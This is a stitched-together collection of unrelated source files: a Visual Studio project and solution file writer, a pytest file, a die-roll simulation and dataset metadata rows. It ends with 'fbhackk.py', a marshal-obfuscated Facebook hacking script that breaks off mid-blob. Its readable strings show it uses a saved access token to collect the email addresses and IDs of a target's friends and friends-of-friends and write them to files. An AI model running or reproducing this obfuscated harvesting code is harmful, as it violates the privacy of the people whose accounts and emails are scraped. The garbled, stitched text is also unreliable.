class VS2017ProjectFileWriter(VS2012ProjectFileWriter):
"""Visual Studio 2017 project file writer."""
def __init__(self):
"""Initializes a Visual Studio project file writer."""
super(VS2017ProjectFileWriter, self).__init__()
self._project_file_version = '15.0.26730.3'
self._tools_version = '15.0'
self._version = 2017
def _WriteItemDefinitionGroup(self, project_configuration):
"""Writes the item definition group.
Args:
project_configuration (VSProjectConfiguration): project configuration.
"""
self._WriteItemDefinitionGroupHeader(project_configuration)
# Write the compiler specific section.
self._WriteClCompileSection(project_configuration)
# Write the librarian specific section.
if project_configuration.librarian_output_file:
self._WriteLibrarianSection(project_configuration)
# Write the linker specific section.
if (project_configuration.linker_values_set or
project_configuration.output_type == (
definitions.OUTPUT_TYPE_APPLICATION)):
self._WriteLinkerSection(project_configuration)
self._WriteItemDefinitionGroupFooter()
def _WriteLinkerSection(self, project_configuration):
"""Writes the linker section.
Args:
project_configuration (VSProjectConfiguration): project configuration.
"""
self.WriteLine(' <Link>')
# Visual Studio will convert an empty additional dependencies value.
if project_configuration.additional_dependencies:
additional_dependencies = ';'.join(
sorted(project_configuration.additional_dependencies))
additional_dependencies = re.sub(
r'[$][(]OutDir[)]\\', r'$(OutDir)', additional_dependencies)
if additional_dependencies and additional_dependencies[-1] != ';':
additional_dependencies = '{0:s};'.format(additional_dependencies)
additional_dependencies = '{0:s}%(AdditionalDependencies)'.format(
additional_dependencies)
self.WriteLine((
' <AdditionalDependencies>{0:s}'
'</AdditionalDependencies>').format(
additional_dependencies))
if project_configuration.linker_output_file:
linker_output_file = re.sub(
r'[$][(]OutDir[)]\\', r'$(OutDir)',
project_configuration.linker_output_file)
self.WriteLine(' <OutputFile>{0:s}</OutputFile>'.format(
linker_output_file))
if project_configuration.module_definition_file != '':
self.WriteLine((
' <ModuleDefinitionFile>{0:s}'
'</ModuleDefinitionFile>').format(
project_configuration.module_definition_file))
if project_configuration.library_directories:
library_directories = ';'.join(project_configuration.library_directories)
library_directories = re.sub(
r'[$][(]OutDir[)]\\', r'$(OutDir)', library_directories)
library_directories = re.sub(r'"', r'', library_directories)
if library_directories and library_directories[-1] != ';':
library_directories = '{0:s};'.format(library_directories)
library_directories = '{0:s}%(AdditionalLibraryDirectories)'.format(
library_directories)
self.WriteLine((
' <AdditionalLibraryDirectories>{0:s}'
'</AdditionalLibraryDirectories>').format(
library_directories))
if project_configuration.generate_debug_information != '':
self.WriteLine((
' <GenerateDebugInformation>{0:s}'
'</GenerateDebugInformation>').format(
project_configuration.generate_debug_information))
if project_configuration.sub_system != '':
self.WriteLine(' <SubSystem>{0:s}</SubSystem>'.format(
project_configuration.sub_system_string))
if project_configuration.optimize_references == '0':
self.WriteLines([
' <OptimizeReferences>',
' </OptimizeReferences>'])
elif project_configuration.optimize_references != '':
self.WriteLine((
' <OptimizeReferences>{0:s}</OptimizeReferences>').format(
project_configuration.optimize_references_string))
if project_configuration.enable_comdat_folding == '0':
self.WriteLines([
' <EnableCOMDATFolding>',
' </EnableCOMDATFolding>'])
elif project_configuration.enable_comdat_folding != '':
self.WriteLine((
' <EnableCOMDATFolding>{0:s}</EnableCOMDATFolding>').format(
project_configuration.enable_comdat_folding_string))
if project_configuration.randomized_base_address != '':
self.WriteLine((
' <RandomizedBaseAddress>{0:s}'
'</RandomizedBaseAddress>').format(
project_configuration.randomized_base_address_string))
if project_configuration.fixed_base_address == '0':
self.WriteLines([
' <FixedBaseAddress>',
' </FixedBaseAddress>'])
if project_configuration.data_execution_prevention != '':
# A value of 0 is represented by an empty element written over two lines.
if project_configuration.data_execution_prevention == '0':
self.WriteLines([
' <DataExecutionPrevention>',
' </DataExecutionPrevention>'])
else:
self.WriteLine((
' <DataExecutionPrevention>{0:s}'
'</DataExecutionPrevention>').format(
project_configuration.data_execution_prevention_string))
if project_configuration.import_library:
import_library = re.sub(
r'[$][(]OutDir[)]\\', r'$(OutDir)',
project_configuration.import_library)
self.WriteLine(' <ImportLibrary>{0:s}</ImportLibrary>'.format(
import_library))
if project_configuration.target_machine != '':
self.WriteLine(' <TargetMachine>{0:s}</TargetMachine>'.format(
project_configuration.target_machine_string))
if project_configuration.output_type != definitions.OUTPUT_TYPE_APPLICATION:
self.WriteLine(
' <ImportLibrary>$(OutDir)$(ProjectName).lib</ImportLibrary>')
self.WriteLine(' </Link>')
def _WriteOutIntDirConditions(
self, configuration_name, project_configurations):
"""Writes the OutDir and IntDir conditions.
Args:
configuration_name (str): name of the configuration.
project_configurations (VSConfigurations): configurations.
"""
for configuration_platform in sorted(project_configurations.platforms):
project_configuration = project_configurations.GetByIdentifier(
configuration_name, configuration_platform)
if len(project_configurations.platforms) == 1:
self.WriteLines([
(' <PropertyGroup Condition="\'$(Configuration)|$(Platform)\'=='
'\'{0:s}|{1:s}\'">').format(
project_configuration.name, project_configuration.platform),
' <OutDir>$(SolutionDir)$(Configuration)\\</OutDir>',
' <IntDir>$(Configuration)\\</IntDir>'])
else:
self.WriteLines([
(' <PropertyGroup Condition="\'$(Configuration)|$(Platform)\'=='
'\'{0:s}|{1:s}\'">').format(
project_configuration.name, project_configuration.platform),
(' <OutDir>$(SolutionDir)$(Configuration)\\$(Platform)\\'
'</OutDir>'),
' <IntDir>$(Configuration)\\$(Platform)\\</IntDir>'])
if project_configuration.output_type == (
definitions.OUTPUT_TYPE_APPLICATION):
self.WriteLine(' <LinkIncremental>false</LinkIncremental>')
self.WriteLine(' </PropertyGroup>')
def WriteHeader(self):
"""Writes a file header."""
self.WriteLines([
'<?xml version="1.0" encoding="utf-8"?>',
('<Project DefaultTargets="Build" ToolsVersion="{0:s}" '
'xmlns="http://schemas.microsoft.com/developer/msbuild/2003">').format(
self._tools_version)])
class VS2019ProjectFileWriter(VS2017ProjectFileWriter):
"""Visual Studio 2019 project file writer."""
def __init__(self):
"""Initializes a Visual Studio project file writer."""
super(VS2019ProjectFileWriter, self).__init__()
self._project_file_version = '16.0.33423.256'
self._tools_version = '15.0'
self._version = 2019
class VS2022ProjectFileWriter(VS2017ProjectFileWriter):
"""Visual Studio 2022 project file writer."""
def __init__(self):
"""Initializes a Visual Studio project file writer."""
super(VS2022ProjectFileWriter, self).__init__()
self._project_file_version = '17.0.33516.290'
self._tools_version = 'Current'
self._version = 2022
def _WriteConfigurationPropertyGroup(self, project_configuration):
"""Writes the configuration property group.
Args:
project_configuration (VSProjectConfiguration): project configuration.
"""
self._WriteConfigurationPropertyGroupHeader(project_configuration)
self.WriteLine(' <ConfigurationType>{0:s}</ConfigurationType>'.format(
project_configuration.output_type_string))
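# v143 is the default platform toolset of Visual Studio 2022.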
self.WriteLine(' <PlatformToolset>v143</PlatformToolset>')
if project_configuration.character_set:
self.WriteLine(' <CharacterSet>{0:s}</CharacterSet>'.format(
project_configuration.character_set_string))
if project_configuration.managed_extensions == '1':
self.WriteLine(' <CLRSupport>true</CLRSupport>')
if project_configuration.whole_program_optimization:
self.WriteLine((
' <WholeProgramOptimization>{0:s}'
'</WholeProgramOptimization>').format(
project_configuration.whole_program_optimization_string))
platform_toolset = project_configuration.GetPlatformToolset(self._version)
if platform_toolset:
self.WriteLine(' <PlatformToolset>{0:s}</PlatformToolset>'.format(
platform_toolset))
self._WriteConfigurationPropertyGroupFooter()
def WriteProjectInformation(self, project_information):
"""Writes the project information.
Args:
project_information (VSProjectInformation): project information.
"""
self.WriteLine(' <PropertyGroup Label="Globals">')
self.WriteLine(' <VCProjectVersion>17.0</VCProjectVersion>')
self.WriteLine(' <ProjectGuid>{{{0:s}}}</ProjectGuid>'.format(
project_information.guid))
self.WriteLine(' <RootNamespace>{0:s}</RootNamespace>'.format(
project_information.root_name_space))
if project_information.keyword:
self.WriteLine(' <Keyword>{0:s}</Keyword>'.format(
project_information.keyword))
self.WriteLine(' </PropertyGroup>')
class VSSolutionFileWriter(FileWriter):
"""Visual Studio solution file writer."""
def _WriteProjectConfigurationPlatforms(
self, solution_configurations, solution_projects):
"""Writes the project configuration platforms.
Args:
solution_configurations (VSConfigurations): configurations.
solution_projects (list[VSSolutionProject]): projects.
"""
if solution_configurations.number_of_configurations > 0:
self.WriteLine(
'\tGlobalSection(ProjectConfigurationPlatforms) = postSolution')
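# ".ActiveCfg" maps the solution configuration to a project configuration;
# ".Build.0" marks the project to be built for that configuration.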
for configuration_platform in sorted(solution_configurations.platforms):
for solution_project in solution_projects:
for configuration_name in sorted(solution_configurations.names):
configuration = solution_configurations.GetByIdentifier(
configuration_name, configuration_platform)
self.WriteLine((
'\t\t{{{0:s}}}.{1:s}|{2:s}.ActiveCfg = {1:s}|{2:s}').format(
solution_project.guid.upper(), configuration.name,
configuration.platform))
self.WriteLine((
'\t\t{{{0:s}}}.{1:s}|{2:s}.Build.0 = {1:s}|{2:s}').format(
solution_project.guid.upper(), configuration.name,
configuration.platform))
self.WriteLine('\tEndGlobalSection')
# pylint: disable=unused-argument
def _WriteSolutionConfigurationPlatforms(
self, solution_configurations, solution_projects):
"""Writes the solution configuration platforms.
Args:
solution_configurations (VSConfigurations): configurations.
solution_projects (list[VSSolutionProject]): projects.
"""
if solution_configurations.number_of_configurations > 0:
self.WriteLine(
'\tGlobalSection(SolutionConfigurationPlatforms) = preSolution')
for configuration_platform in sorted(solution_configurations.platforms):
for configuration_name in sorted(solution_configurations.names):
configuration = solution_configurations.GetByIdentifier(
configuration_name, configuration_platform)
self.WriteLine('\t\t{0:s}|{1:s} = {0:s}|{1:s}'.format(
configuration.name, configuration.platform))
self.WriteLine('\tEndGlobalSection')
def _WriteSolutionProperties(self):
"""Writes the solution properties."""
self.WriteLines([
'\tGlobalSection(SolutionProperties) = preSolution',
'\t\tHideSolutionNode = FALSE',
'\tEndGlobalSection'])
@abc.abstractmethod
def WriteHeader(self):
"""Writes a file header."""
@abc.abstractmethod
def WriteProject(self, solution_project):
"""Writes a project section.
Args:
solution_project (VSSolutionProject): project.
"""
def WriteProjects(self, solution_projects):
"""Writes the projects.
Args:
solution_projects (list[VSSolutionProject]): projects.
"""
for solution_project in solution_projects:
self.WriteProject(solution_project)
class VS2008SolutionFileWriter(VSSolutionFileWriter):
"""Visual Studio 2008 solution file writer."""
def WriteConfigurations(self, solution_configurations, solution_projects):
"""Writes the configurations.
Args:
solution_configurations (VSConfigurations): configurations.
solution_projects (list[VSSolutionProject]): projects.
"""
self.WriteLine('Global')
self._WriteSolutionConfigurationPlatforms(
solution_configurations, solution_projects)
self._WriteProjectConfigurationPlatforms(
solution_configurations, solution_projects)
self._WriteSolutionProperties()
self.WriteLine('EndGlobal')
def WriteHeader(self):
"""Writes a file header."""
self.WriteBinaryData(b'\xef\xbb\xbf\r\n')
self.WriteLines([
'Microsoft Visual Studio Solution File, Format Version 10.00',
'# Visual C++ Express 2008'])
def WriteProject(self, solution_project):
"""Writes a project section.
Args:
solution_project (VSSolutionProject): project.
"""
solution_project_filename = '{0:s}.vcproj'.format(
solution_project.filename)
self.WriteLine((
'Project("{{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}}") = "{0:s}", '
'"{1:s}", "{{{2:s}}}"').format(
solution_project.name, solution_project_filename,
solution_project.guid.upper()))
if solution_project.dependencies:
self.WriteLine(
'\tProjectSection(ProjectDependencies) = postProject')
for dependency_guid in solution_project.dependencies:
self.WriteLine('\t\t{{{0:s}}} = {{{0:s}}}'.format(
dependency_guid.upper()))
self.WriteLine('\tEndProjectSection')
self.WriteLine('EndProject')
class VS2010SolutionFileWriter(VSSolutionFileWriter):
"""Visual Studio 2010 solution file writer."""
def WriteConfigurations(self, solution_configurations, solution_projects):
"""Writes the configurations.
Args:
solution_configurations (VSConfigurations): configurations.
solution_projects (list[VSSolutionProject]): projects.
"""
self.WriteLine('Global')
self._WriteSolutionConfigurationPlatforms(
solution_configurations, solution_projects)
self._WriteProjectConfigurationPlatforms(
solution_configurations, solution_projects)
self._WriteSolutionProperties()
self.WriteLine('EndGlobal')
def WriteHeader(self):
"""Writes a file header."""
self.WriteBinaryData(b'\xef\xbb\xbf\r\n')
self.WriteLines([
'Microsoft Visual Studio Solution File, Format Version 11.00',
'# Visual C++ Express 2010'])
def WriteProject(self, solution_project):
"""Writes a project section.
Args:
solution_project (VSSolutionProject): project.
"""
solution_project_filename = '{0:s}.vcxproj'.format(
solution_project.filename)
self.WriteLine((
'Project("{{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}}") = "{0:s}", '
'"{1:s}", "{{{2:s}}}"').format(
solution_project.name, solution_project_filename,
solution_project.guid.upper()))
self.WriteLine('EndProject')
class VS2012SolutionFileWriter(VS2010SolutionFileWriter):
"""Visual Studio 2012 solution file writer."""
def WriteHeader(self):
"""Writes a file header."""
self.WriteBinaryData(b'\xef\xbb\xbf\r\n')
self.WriteLines([
'Microsoft Visual Studio Solution File, Format Version 12.00',
'# Visual Studio Express 2012 for Windows Desktop'])
def WriteProject(self, solution_project):
"""Writes a project section.
Args:
solution_project (VSSolutionProject): project.
"""
solution_project_filename = '{0:s}.vcxproj'.format(
solution_project.filename)
self.WriteLine((
'Project("{{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}}") = "{0:s}", '
'"{1:s}", "{{{2:s}}}"').format(
solution_project.name, solution_project_filename,
solution_project.guid.upper()))
# TODO: what about:
# '\tProjectSection(ProjectDependencies) = postProject'
# '\t\t{%GUID%} = {%GUID}'
# '\tEndProjectSection'
self.WriteLine('EndProject')
class VS2013SolutionFileWriter(VS2010SolutionFileWriter):
"""Visual Studio 2013 solution file writer."""
def WriteHeader(self):
"""Writes a file header."""
self.WriteBinaryData(b'\xef\xbb\xbf\r\n')
self.WriteLines([
'Microsoft Visual Studio Solution File, Format Version 12.00',
'# Visual Studio Express 2013 for Windows Desktop',
'VisualStudioVersion = 12.0.21005.1',
'MinimumVisualStudioVersion = 10.0.40219.1'])
class VS2015SolutionFileWriter(VS2010SolutionFileWriter):
"""Visual Studio 2015 solution file writer."""
def WriteHeader(self):
"""Writes a file header."""
self.WriteBinaryData(b'\xef\xbb\xbf\r\n')
self.WriteLines([
'Microsoft Visual Studio Solution File, Format Version 12.00',
'# Visual Studio 14',
'VisualStudioVersion = 14.0.25420.1',
'MinimumVisualStudioVersion = 10.0.40219.1'])
class VS2017SolutionFileWriter(VS2010SolutionFileWriter):
"""Visual Studio 2017 solution file writer."""
def _WriteExtensibilityGlobals(self):
"""Writes the extensibility globals."""
# TODO: determine if GUID is unique.
self.WriteLines([
'\tGlobalSection(ExtensibilityGlobals) = postSolution',
'\t\tSolutionGuid = {E41FC29C-7FE6-4F98-85AD-1ED968E86446}',
'\tEndGlobalSection'])
def WriteConfigurations(self, solution_configurations, solution_projects):
"""Writes the configurations.
Args:
solution_configurations (VSConfigurations): configurations.
solution_projects (list[VSSolutionProject]): projects.
"""
self.WriteLine('Global')
self._WriteSolutionConfigurationPlatforms(
solution_configurations, solution_projects)
self._WriteProjectConfigurationPlatforms(
solution_configurations, solution_projects)
self._WriteSolutionProperties()
# self._WriteExtensibilityGlobals()
self.WriteLine('EndGlobal')
def WriteHeader(self):
"""Writes a file header."""
self.WriteBinaryData(b'\xef\xbb\xbf\r\n')
self.WriteLines([
'Microsoft Visual Studio Solution File, Format Version 12.00',
'# Visual Studio 15',
'VisualStudioVersion = 15.0.26730.10',
'MinimumVisualStudioVersion = 10.0.40219.1'])
class VS2019SolutionFileWriter(VS2017SolutionFileWriter):
"""Visual Studio 2019 solution file writer."""
def WriteHeader(self):
"""Writes a file header."""
self.WriteBinaryData(b'\xef\xbb\xbf\r\n')
self.WriteLines([
'Microsoft Visual Studio Solution File, Format Version 12.00',
'# Visual Studio Version 16',
'VisualStudioVersion = 16.0.33423.256',
'MinimumVisualStudioVersion = 10.0.40219.1'])
class VS2022SolutionFileWriter(VS2017SolutionFileWriter):
"""Visual Studio 2022 solution file writer."""
def WriteHeader(self):
"""Writes a file header."""
self.WriteBinaryData(b'\xef\xbb\xbf\r\n')
self.WriteLines([
'Microsoft Visual Studio Solution File, Format Version 12.00',
'# Visual Studio Version 17',
'VisualStudioVersion = 17.5.33516.290',
'MinimumVisualStudioVersion = 10.0.40219.1'])
|
[
"[email protected]"
] | |
38a81091e93b14ef1136031dcd8071060b60dc35
|
1ff6cd4b1114b530a0f2918f6d2193b2ce270bcf
|
/Week-2/Day_4/die_roll.py
|
6d39b06fc9f5660daad7d8d3199b080ad48932b8
|
[] |
no_license
|
Ace238/python-bootcamp
|
e8fac460488701eff6453bd81ddab8eb4059a2aa
|
adea58b8f9b87a52338181f677f01d6cbc802046
|
refs/heads/master
| 2020-12-05T15:08:58.366028 | 2020-01-16T05:22:02 | 2020-01-16T05:22:02 | 232,150,937 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,582 |
py
|
import random
def roll_die(dice_max=6):
"""
returns a die roll - a random integer between 1 and dice_max
1 through dice_max are the sides of the die (6 for a standard die)
"""
return random.randint(1, dice_max)
def monte_carlo(n):
"""
performs a monte carlo simulation of a die roll
[PARAM]\t n (int) - number of samples
[RETURN]\t None - prints out the results of the simulation
"""
one_count = 0
two_count = 0
three_count = 0
four_count = 0
five_count = 0
six_count = 0
exp_count = 0
while exp_count < n:
result = roll_die()
if(result == 1):
one_count += 1
elif(result == 2):
two_count += 1
elif(result == 3):
three_count += 1
elif(result == 4):
four_count += 1
elif(result == 5):
five_count += 1
elif(result == 6):
six_count += 1
exp_count += 1
print(f"There were {n} simulations performed.")
msg = f"There were {(one_count/n) * 100}% ones"
print(msg)
msg = f"There were {(two_count/n) * 100}% twos"
print(msg)
msg = f"There were {(three_count/n) * 100}% threes"
print(msg)
msg = f"There were {(four_count/n) * 100}% fours"
print(msg)
msg = f"There were {(five_count/n) * 100}% fives"
print(msg)
msg = f"There were {(six_count/n) * 100}% sixes"
print(msg)
# monte_carlo(100000)
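# monte_carlo_with_lists generalizes the tally above: every roll is stored
# in a list and list.count() is used per outcome, so it works for any
# number of sides.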
def monte_carlo_with_lists(N, dice_max = 6):
results = []
for exp in range(0,N):
results.append(roll_die(dice_max))
print(f"{N} experiments performed")
for outcome in range(1, dice_max + 1):
count = results.count(outcome)
msg = f"The probability of {outcome} = {(count/N)*100}%"
print(msg)
dice_max = 10
monte_carlo_with_lists(10000, dice_max)
|
[
"[email protected]"
] | |
e54bf365ae9ed61261b9902b687769361a488445
|
dfbc64250dfdecbf70377b6cf6549e04521795ec
|
/codingALGO/test_solve.py
|
02d9f40f03d44be312992c89f5619a2bc3a41fa2
|
[] |
no_license
|
sagarrshd/mm
|
60a939d09cc0cef3ce191a3e3b7d387fbcbbcca5
|
7fb9287c567507a5e6a05b6367bc21b15d03d984
|
refs/heads/master
| 2023-04-18T10:11:28.492485 | 2021-05-01T19:14:15 | 2021-05-01T19:14:15 | 363,487,969 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 247 |
py
|
import pytest
from solve import count_sum_lists
def test1():
A = [1, 2, 8]
k = 1000
B = 2
res = count_sum_lists(A, k, B)
assert res == 3
def test2():
A = [5, 17, 10000, 11]
k = 1000
B = 4
res = count_sum_lists(A, k, B)
assert res == 0
|
[
"[email protected]"
] | |
848b91f09b40a31a3b9e5798f08cb9dc68841a53
|
bd8b3d43a465b26f0d86a3007b41d6a3c22345a6
|
/svsutils/iterators/__init__.py
|
6bde41920adb8b8446e1ce7254e5cba9a485b1fe
|
[] |
no_license
|
nathanin/svsutils
|
aed5d361ff4716390e093d6bab6bf3cc6dd69a9b
|
5789c3e589ce9244b21a24d6cdc3909bc4e04517
|
refs/heads/master
| 2020-06-25T06:06:37.019860 | 2019-12-17T05:08:35 | 2019-12-17T05:08:35 | 199,225,548 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 122 |
py
|
from .iterator_factory import PythonIterator, TensorflowIterator
__all__ = [
'PythonIterator',
'TensorflowIterator'
]
|
[
"[email protected]"
] | |
4ae5f578d4843f3c010396030d69aa334d3cb6e3
|
3fdda7a9a8efb5c41302fe39cf8cd74c09aa2326
|
/fbhackk.py
|
dba2d05a9f3a2997c14a7edaf34c360ab584cebd
|
[] |
no_license
|
RandiSr/dark-fb
|
330809c38fe713c2d70e1571a17f400ba7e5edf5
|
0088d24c5b344fc71d8327dcf70ef1717cf224c4
|
refs/heads/master
| 2020-07-22T02:51:11.719676 | 2019-09-08T03:09:14 | 2019-09-08T03:09:14 | 207,052,986 | 1 | 1 | null | null | null | null |
UTF-8
|
Python
| false | false | 204,567 |
py
|
#Coder By: RandiSr
#Feel free to recode it ;v
#Team: Muslim Cyber Army
#Github: https://github.com/RandiSr
#Channel Youtube: RANDIOLOYY
import marshal
\x01\x00}\x04\x00t\x0e\x00j\x0f\x00|\x04\x00j\x10\x00\x83\x01\x00}\x05\x00t\x13\x00d\x10\x00\x83\x01\x00\x01d\x11\x00d\x12\x00\x14GHt\x02\x00d\x13\x00d\x14\x00\x83\x02\x00}\x06\x00x\xcb\x00|\x05\x00d\x15\x00\x19D]\xbf\x00}\x07\x00t\x0c\x00j\r\x00d\t\x00|\x07\x00d\x16\x00\x19\x17d\n\x00\x17|\x00\x00\x17\x83\x01\x00}\x08\x00t\x0e\x00j\x0f\x00|\x08\x00j\x10\x00\x83\x01\x00}\t\x00yt\x00t\x14\x00j\x15\x00|\t\x00d\x17\x00\x19\x83\x01\x00\x01|\x06\x00j\x16\x00|\t\x00d\x17\x00\x19d\x18\x00\x17\x83\x01\x00\x01d\x19\x00t\x17\x00t\x18\x00t\x14\x00\x83\x01\x00\x83\x01\x00\x17d\x1a\x00\x17|\t\x00d\x17\x00\x19\x17d\x1b\x00\x17|\t\x00d\x0c\x00\x19\x17d\x18\x00\x17Gt\x19\x00j\x1a\x00j\x1b\x00\x83\x00\x00\x01t\x05\x00j\x06\x00d\x1c\x00\x83\x01\x00\x01Wqh\x01\x04t\x11\x00k\n\x00r&\x02\x01\x01\x01qh\x01Xqh\x01W|\x06\x00j\x1c\x00\x83\x00\x00\x01d\x11\x00d\x12\x00\x14GHd\x1d\x00GHd\x1e\x00t\x18\x00t\x14\x00\x83\x01\x00\x16GHt\x0b\x00d\x1f\x00\x83\x01\x00}\n\x00t\x00\x00j\x1d\x00d\x13\x00d \x00|\n\x00\x17\x83\x02\x00\x01d!\x00|\n\x00\x17GHt\x0b\x00d\x0e\x00\x83\x01\x00\x01t\x12\x00\x83\x00\x00\x01Wn\x9b\x00\x04t\x04\x00k\n\x00r\xb6\x02\x01\x01\x01d"\x00GHt\x0b\x00d\x0e\x00\x83\x01\x00\x01t\x12\x00\x83\x00\x00\x01nu\x00\x04t\x1e\x00t\x1f\x00f\x02\x00k\n\x00r\xe2\x02\x01\x01\x01d#\x00GHt\x0b\x00d\x0e\x00\x83\x01\x00\x01t\x12\x00\x83\x00\x00\x01nI\x00\x04t\x11\x00k\n\x00r\x08\x03\x01\x01\x01d$\x00GHt\x0b\x00d\x0e\x00\x83\x01\x00\x01t\x12\x00\x83\x00\x00\x01n#\x00\x04t\x0c\x00j \x00j!\x00k\n\x00r*\x03\x01\x01\x01d%\x00GHt"\x00\x83\x00\x00\x01n\x01\x00Xd\x00\x00S(&\x00\x00\x00NR&\x00\x00\x00s\t\x00\x00\x00login.txtR\'\x00\x00\x00s\x1a\x00\x00\x00\x1b[1;91m[!] Token not founds\x10\x00\x00\x00rm -rf login.txti\x01\x00\x00\x00R\x90\x00\x00\x00s2\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mInput ID friend \x1b[1;91m: \x1b[1;97ms\x1b\x00\x00\x00https://graph.facebook.com/s\x0e\x00\x00\x00?access_token=s7\x00\x00\x00\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mFrom\x1b[1;91m :\x1b[1;97m R0\x00\x00\x00s\x1b\x00\x00\x00\x1b[1;91m[!] Friend not founds\x1e\x00\x00\x00\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]s\x16\x00\x00\x00/friends?access_token=s?\x00\x00\x00\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mGet all friend email from friend \x1b[1;97m...i*\x00\x00\x00s\n\x00\x00\x00\x1b[1;97m\xe2\x95\x90s\x1b\x00\x00\x00out/em_teman_from_teman.txtR\x11\x00\x00\x00Rl\x00\x00\x00Rj\x00\x00\x00R?\x00\x00\x00s\x01\x00\x00\x00\ns\x11\x00\x00\x00\r\x1b[1;97m[ \x1b[1;92ms\x1a\x00\x00\x00\x1b[1;97m ]\x1b[1;97m=> \x1b[1;97ms\x03\x00\x00\x00 | g-C\x1c\xeb\xe26\x1a?sE\x00\x00\x00\r\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mSuccessfully get email \x1b[1;97m....s1\x00\x00\x00\r\x1b[1;91m[+] \x1b[1;92mTotal Email \x1b[1;91m: \x1b[1;97m%ss7\x00\x00\x00\r\x1b[1;91m[+] \x1b[1;92mSave file with name\x1b[1;91m :\x1b[1;97m s\x04\x00\x00\x00out/s2\x00\x00\x00\r\x1b[1;91m[+] \x1b[1;92mFile saved \x1b[1;91m: \x1b[1;97mout/s\x1e\x00\x00\x00\x1b[1;91m[!] Error creating files\x12\x00\x00\x00\x1b[1;91m[!] Stoppeds\x10\x00\x00\x00\x1b[1;91m[!] 
Errors\x1a\x00\x00\x00\x1b[1;91m[\xe2\x9c\x96] No connection(#\x00\x00\x00R\x05\x00\x00\x00R(\x00\x00\x00R)\x00\x00\x00R*\x00\x00\x00R-\x00\x00\x00R\x1c\x00\x00\x00R\x1d\x00\x00\x00R2\x00\x00\x00R\x91\x00\x00\x00R\x92\x00\x00\x00R.\x00\x00\x00R/\x00\x00\x00Rb\x00\x00\x00Rc\x00\x00\x00Rd\x00\x00\x00Re\x00\x00\x00Rf\x00\x00\x00R,\x00\x00\x00R\x80\x00\x00\x00R \x00\x00\x00t\x0b\x00\x00\x00emfromtemanR\x94\x00\x00\x00R\x19\x00\x00\x00R\x17\x00\x00\x00R\x0e\x00\x00\x00R\x06\x00\x00\x00R\x18\x00\x00\x00R\x1b\x00\x00\x00Rg\x00\x00\x00R\x95\x00\x00\x00R\x96\x00\x00\x00R\x97\x00\x00\x00Ri\x00\x00\x00R\x01\x00\x00\x00R\x08\x00\x00\x00(\x0b\x00\x00\x00R4\x00\x00\x00R\x9c\x00\x00\x00R\x9d\x00\x00\x00R\x9e\x00\x00\x00R\'\x00\x00\x00Rm\x00\x00\x00R\x98\x00\x00\x00R\x13\x00\x00\x00R\x10\x00\x00\x00R\x1e\x00\x00\x00R\x99\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x03\x00\x00\x00<s>R\x8c\x00\x00\x00\xff\x02\x00\x00s\x80\x00\x00\x00\x00\x01\r\x01\x03\x01\x19\x01\r\x01\x05\x01\r\x01\r\x01\x0b\x01\x03\x01\x11\x01\r\x01\x04\x01\x03\x01\r\x01\x05\x01\x0c\x01\x03\x01\x1b\x01\x12\x01\x11\x01\r\x01\x05\x01\n\x01\x0b\x01\x1b\x01\x12\x01\n\x01\t\x01\x0f\x01\x11\x01\x1f\x01\x12\x01\x03\x01\x11\x01\x15\x010\x00\r\x00\x11\x01\r\x01\x08\x01\n\x01\t\x01\x05\x01\x0f\x01\x0c\x01\x14\x01\t\x01\n\x01\x0b\x01\r\x01\x05\x01\n\x01\n\x01\x13\x01\x05\x01\n\x01\n\x01\r\x01\x05\x01\n\x01\n\x01\x13\x01\x05\x01c\x00\x00\x00\x00\x08\x00\x00\x00\x06\x00\x00\x00C\x00\x00\x00s\xb9\x02\x00\x00t\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01y\x19\x00t\x02\x00d\x02\x00d\x03\x00\x83\x02\x00j\x03\x00\x83\x00\x00}\x00\x00Wn7\x00\x04t\x04\x00k\n\x00r_\x00\x01\x01\x01d\x04\x00GHt\x00\x00j\x01\x00d\x05\x00\x83\x01\x00\x01t\x05\x00j\x06\x00d\x06\x00\x83\x01\x00\x01t\x07\x00\x83\x00\x00\x01n\x01\x00Xy\x11\x00t\x00\x00j\x08\x00d\x07\x00\x83\x01\x00\x01Wn\x11\x00\x04t\t\x00k\n\x00r\x84\x00\x01\x01\x01n\x01\x00Xy\x92\x01t\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01t\n\x00GHt\x0b\x00d\x08\x00\x83\x01\x00\x01d\t\x00d\n\x00\x14GHd\x0b\x00|\x00\x00\x17}\x01\x00t\x0c\x00j\r\x00|\x01\x00\x83\x01\x00}\x02\x00t\x0e\x00j\x0f\x00|\x02\x00j\x10\x00\x83\x01\x00}\x03\x00t\x02\x00d\x0c\x00d\r\x00\x83\x02\x00}\x04\x00x\xcb\x00|\x03\x00d\x0e\x00\x19D]\xbf\x00}\x05\x00t\x0c\x00j\r\x00d\x0f\x00|\x05\x00d\x10\x00\x19\x17d\x11\x00\x17|\x00\x00\x17\x83\x01\x00}\x06\x00t\x0e\x00j\x0f\x00|\x06\x00j\x10\x00\x83\x01\x00}\x03\x00yt\x00t\x11\x00j\x12\x00|\x03\x00d\x12\x00\x19\x83\x01\x00\x01|\x04\x00j\x13\x00|\x03\x00d\x12\x00\x19d\x13\x00\x17\x83\x01\x00\x01d\x14\x00t\x14\x00t\x15\x00t\x11\x00\x83\x01\x00\x83\x01\x00\x17d\x15\x00\x17|\x03\x00d\x12\x00\x19\x17d\x16\x00\x17|\x03\x00d\x17\x00\x19\x17d\x13\x00\x17Gt\x16\x00j\x17\x00j\x18\x00\x83\x00\x00\x01t\x05\x00j\x06\x00d\x18\x00\x83\x01\x00\x01Wq\xf2\x00\x04t\x19\x00k\n\x00r\xb0\x01\x01\x01\x01q\xf2\x00Xq\xf2\x00W|\x04\x00j\x1a\x00\x83\x00\x00\x01d\t\x00d\n\x00\x14GHd\x19\x00GHd\